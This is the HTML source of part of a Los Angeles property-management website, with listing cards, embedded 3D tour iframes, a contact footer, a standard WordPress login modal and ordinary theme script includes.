&#8211; 11846 Culver Blvd. Los Angeles, CA 9006</p> <a class="more-details" href="http://benleedsproperties.com/property/11736-culver-blvd-los-angeles-ca/">More Details <i class="fa fa-caret-right"></i></a> </div> </article> </div><div class="clearfix"></div> </div><!-- end of #home-properties --> </div><!-- end of #home-properties-wrapper --> <div class="svg-loader"> <img src="http://benleedsproperties.com/wp-content/themes/realhomes/images/loading-bars.svg" width="32" height="32"> </div> </div><!-- end of #home-properties-section-inner --> </div><!-- end of #home-properties-section-wrapper --> </section> </div><!-- End Main Content --> </div> <!-- End span12 --> </div><!-- End row --> </div><!-- End content --> </div><!-- End Content Container --> <div class="feature_container"> <!-- Content --> <div class="container contents"> <div class="row"> <div class="span12"> <div class="main "> <section class="featured-properties-carousel clearfix"> <div class="narrative"> <h3>Featured Properties</h3> <p>Look at our Latest listed properties and check out the facilities on them. </p> </div> <div class="carousel es-carousel-wrapper"> <div class="es-carousel"> <ul class="clearfix"> <li> <figure> <a href="http://benleedsproperties.com/property/11736-culver-blvd-los-angeles-ca/" title="11730 &#8211; 11846 Culver Blvd., Los Angeles, CA 90066"> <img width="244" height="163" src="http://benleedsproperties.com/wp-content/uploads/2015/05/45-244x163.jpg" class="attachment-property-thumb-image size-property-thumb-image wp-post-image" alt="" srcset="http://benleedsproperties.com/wp-content/uploads/2015/05/45-244x163.jpg 244w, http://benleedsproperties.com/wp-content/uploads/2015/05/45-300x200.jpg 300w, http://benleedsproperties.com/wp-content/uploads/2015/05/45-1024x683.jpg 1024w, http://benleedsproperties.com/wp-content/uploads/2015/05/45-150x100.jpg 150w" sizes="(max-width: 244px) 100vw, 244px" /> </a> </figure> <h4><a href="http://benleedsproperties.com/property/11736-culver-blvd-los-angeles-ca/">11730 &#8211; 11846 Culver Blvd., Los Angeles, CA 90066</a></h4> <p>11730 &#8211; 11846 Culver Blvd. Los Angeles, CA&hellip; <a href="http://benleedsproperties.com/property/11736-culver-blvd-los-angeles-ca/"> Know More </a> </p> </li> <li> <figure> <a href="http://benleedsproperties.com/property/1928-chariton-st-los-angeles-ca/" title="1928 Chariton St., Los Angeles, CA 90034"> <img width="244" height="163" src="http://benleedsproperties.com/wp-content/uploads/2015/05/1928chariton1-244x163.jpg" class="attachment-property-thumb-image size-property-thumb-image wp-post-image" alt="" /> </a> </figure> <h4><a href="http://benleedsproperties.com/property/1928-chariton-st-los-angeles-ca/">1928 Chariton St., Los Angeles, CA 90034</a></h4> <p>1928 Chariton St. Los Angeles, CA 90034 <a href="http://benleedsproperties.com/property/1928-chariton-st-los-angeles-ca/"> Know More </a> </p> </li> </ul> </div> </div> </section> <section class="home-recent-posts container-fluid clearfix"> <div class="section-title"> <h3>3D Tours</h3> <p>Take a 3D Tour of some of our properties...</p> </div> <div class="recent-posts-container row-fluid clearfix"> <article class="span4 clearfix post-6024 post type-post status-publish format-video hentry category-3d-tour tag-159 tag-los-angeles tag-venice-boulevard post_format-post-format-video"> <div class="post-video"> <span class="format-icon video"></span> <div class="video-wrapper on-home-page"> <iframe width='853' height='480' src='http://www.touritnow.com/3d-model/11900-venice-blvd-unit-6-los-angeles-ca-90066/fullscreen/?embedded' frameborder='0' allowfullscreen='allowfullscreen'></iframe> </div> </div> <h4 class="post-title"><a href="http://benleedsproperties.com/11900-venice-blvd-los-angeles-ca-90066/">11900 Venice Blvd., Los Angeles, CA 90066</a></h4> <div class="post-meta"> <span>On <span class="date"> December 05, 2017</span></span> <span>by <span class="author-link">Clay</span></span> </div> <p>Here&#8217;s a direct link to the 3D Tour: 3D Tour Full-Screen: http://www.touritnow.com/3d-model/11900-venice-blvd-unit-6-los-angeles-ca-90066/fullscreen/?embedded</p> <a class="more-details" href="http://benleedsproperties.com/11900-venice-blvd-los-angeles-ca-90066/">Read More <i class="fa fa-caret-right"></i></a> </article> <article class="span4 clearfix post-6021 post type-post status-publish format-video hentry category-3d-tour tag-155 tag-frank-street tag-santa-monica tag-virginia-avenue post_format-post-format-video"> <div class="post-video"> <span class="format-icon video"></span> <div class="video-wrapper on-home-page"> <iframe width='853' height='480' src='http://www.touritnow.com/3d-model/1957-frank-st-unit-9-santa-monica-ca-90404/fullscreen/?embedded' frameborder='0' allowfullscreen='allowfullscreen'></iframe> </div> </div> <h4 class="post-title"><a href="http://benleedsproperties.com/1957-frank-st-virginia-ave-santa-monica-ca-90404/">1957 Frank St. (Virginia Ave), Santa Monica, CA 90404</a></h4> <div class="post-meta"> <span>On <span class="date"> December 05, 2017</span></span> <span>by <span class="author-link">Clay</span></span> </div> <p></p> <a class="more-details" href="http://benleedsproperties.com/1957-frank-st-virginia-ave-santa-monica-ca-90404/">Read More <i class="fa fa-caret-right"></i></a> </article> <article class="span4 clearfix post-6019 post type-post status-publish format-video hentry category-3d-tour tag-153 tag-motor-avenue post_format-post-format-video"> <div class="post-video"> <span class="format-icon video"></span> <div class="video-wrapper on-home-page"> <iframe width='853' height='480' src='http://www.touritnow.com/3d-model/3742-motor-ave-4-los-angeles-ca-90034/fullscreen/?embedded' frameborder='0' allowfullscreen='allowfullscreen'></iframe> </div> </div> <h4 class="post-title"><a href="http://benleedsproperties.com/3742-motor-ave-los-angeles-ca-90034/">3742 Motor Ave., Los Angeles, CA 90034</a></h4> <div class="post-meta"> <span>On <span class="date"> December 05, 2017</span></span> <span>by <span class="author-link">benleeds</span></span> </div> <p></p> <a class="more-details" href="http://benleedsproperties.com/3742-motor-ave-los-angeles-ca-90034/">Read More <i class="fa fa-caret-right"></i></a> </article> </div> </section> </div><!-- End Main Content --> </div> <!-- End span12 --> </div><!-- End row --> </div><!-- End content --> </div><!-- End Feature Container --> <!-- Start Footer --> <footer id="footer-wrapper"> <div id="footer" class="container"> <div class="row"> <div class="span3"> <section id="nav_menu-2" class="widget clearfix widget_nav_menu"><h3 class="title">About Ben Leeds</h3><div class="menu-footer-first-column-container"><ul id="menu-footer-first-column" class="menu"><li id="menu-item-1810" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1810"><a href="http://benleedsproperties.com/about/">About Ben Leeds</a></li> <li id="menu-item-5506" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5506"><a href="http://benleedsproperties.com/vacancy/">Vacancy</a></li> </ul></div></section> </div> <div class="span3"> <section id="nav_menu-3" class="widget clearfix widget_nav_menu"><h3 class="title">Services</h3><div class="menu-footer-second-column-container"><ul id="menu-footer-second-column" class="menu"><li id="menu-item-1357" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1357"><a href="/contact/">Make a Payment</a></li> </ul></div></section> </div> <div class="clearfix visible-tablet"></div> <div class="span3"> </div> <div class="span3"> <section id="text-4" class="widget clearfix widget_text"><h3 class="title">Contact Info</h3> <div class="textwidget"><p>3385 Overland Ave,<br /> Los Angeles, CA 90034</p> <p>Leasing Department: (424) 543-4181<br /> Office Phone: (310)815-9015</p> <p>Email: <a href="mailto:[email protected]">[email protected]</a></p> </div> </section> </div> </div> </div> <!-- Footer Bottom --> <div id="footer-bottom" class="container"> <div class="row"> <div class="span6"> <p class="copyright">Ben Leeds Properties - Copyright © 2015</p> </div> <div class="span6"> </div> </div> </div> <!-- End Footer Bottom --> </footer><!-- End Footer --> <!-- Login Modal --> <div id="login-modal" class="forms-modal modal hide fade" tabindex="-1" role="dialog" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <p>Login required for member only features.</p> </div> <!-- start of modal body --> <div class="modal-body"> <!-- login section --> <div class="login-section modal-section"> <h4>Login</h4> <form id="login-form" class="login-form" action="http://benleedsproperties.com/wp-admin/admin-ajax.php" method="post" enctype="multipart/form-data"> <div class="form-option"> <label for="username">User Name<span>*</span></label> <input id="username" name="log" type="text" class="required" title="* Provide user name!" autofocus required/> </div> <div class="form-option"> <label for="password">Password<span>*</span></label> <input id="password" name="pwd" type="password" class="required" title="* Provide password!" required/> </div> <input type="hidden" name="action" value="inspiry_ajax_login" /> <input type="hidden" id="inspiry-secure-login" name="inspiry-secure-login" value="df527927a5" /><input type="hidden" name="_wp_http_referer" value="/" /><input type="hidden" name="redirect_to" value="http://benleedsproperties.com/" /> <input type="hidden" name="user-cookie" value="1" /> <input type="submit" id="login-button" name="submit" value="Log in" class="real-btn login-btn" /> <img id="login-loader" class="modal-loader" src="http://benleedsproperties.com/wp-content/themes/realhomes/images/ajax-loader.gif" alt="Working..."> <div> <div id="login-message" class="modal-message"></div> <div id="login-error" class="modal-error"></div> </div> </form> <div class="inspiry-social-login"> </div> <p> <a class="activate-section" data-section="forgot-section" href="#">Forgot Password</a> </p> </div> <!-- forgot section --> <div class="forgot-section modal-section"> <h4>Reset Password</h4> <form action="http://benleedsproperties.com/wp-admin/admin-ajax.php" id="forgot-form" method="post" enctype="multipart/form-data"> <div class="form-option"> <label for="reset_username_or_email">Username or Email<span>*</span></label> <input id="reset_username_or_email" name="reset_username_or_email" type="text" class="required" title="* Provide username or email!" required/> </div> <input type="hidden" name="action" value="inspiry_ajax_forgot" /> <input type="hidden" name="user-cookie" value="1" /> <input type="submit" id="forgot-button" name="user-submit" value="Reset Password" class="real-btn register-btn" /> <img id="forgot-loader" class="modal-loader" src="http://benleedsproperties.com/wp-content/themes/realhomes/images/ajax-loader.gif" alt="Working..."> <input type="hidden" id="inspiry-secure-reset" name="inspiry-secure-reset" value="ab85f6ca09" /><input type="hidden" name="_wp_http_referer" value="/" /> <div> <div id="forgot-message" class="modal-message"></div> <div id="forgot-error" class="modal-error"></div> </div> </form> <p> <a class="activate-section" data-section="login-section" href="#">Login Here</a> </p> </div> </div> <!-- end of modal-body --> </div><div style="background:#aeb5bc;"> <p class="my_class" style="visibility: hidden; text-align:center;margin-bottom:0px;">Powered by<a href="https://www.crispbot.com">crispbot.com</a></p></div> <script type='text/javascript' src='http://benleedsproperties.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://benleedsproperties.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://benleedsproperties.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://benleedsproperties.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://benleedsproperties.com/wp-includes/js/wp-a11y.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."}; /* ]]> */ </script> <script type='text/javascript' src='http://benleedsproperties.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://benleedsproperties.com/wp-includes/js/comment-reply.min.js?ver=5.1.1'></script> <script type='text/javascript' src='http://benleedsproperties.com/wp-content/themes/realhomes/js/inspiry-login-register.js?ver=2.6.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var localizedSearchParams = {"rent_slug":"for-rent"}; /* ]]> */ </script> <script type='text/javascript' src='http://benleedsproperties.com/wp-content/themes/realhomes/js/inspiry-search-form.js?ver=2.6.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var localized = {"nav_title":"Go to..."}; /* ]]> */ </script> <script type='text/javascript' src='http://benleedsproperties.com/wp-content/themes/realhomes/js/custom.js?ver=2.6.2'></script> <script type='text/javascript' src='http://benleedsproperties.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> </body> </html>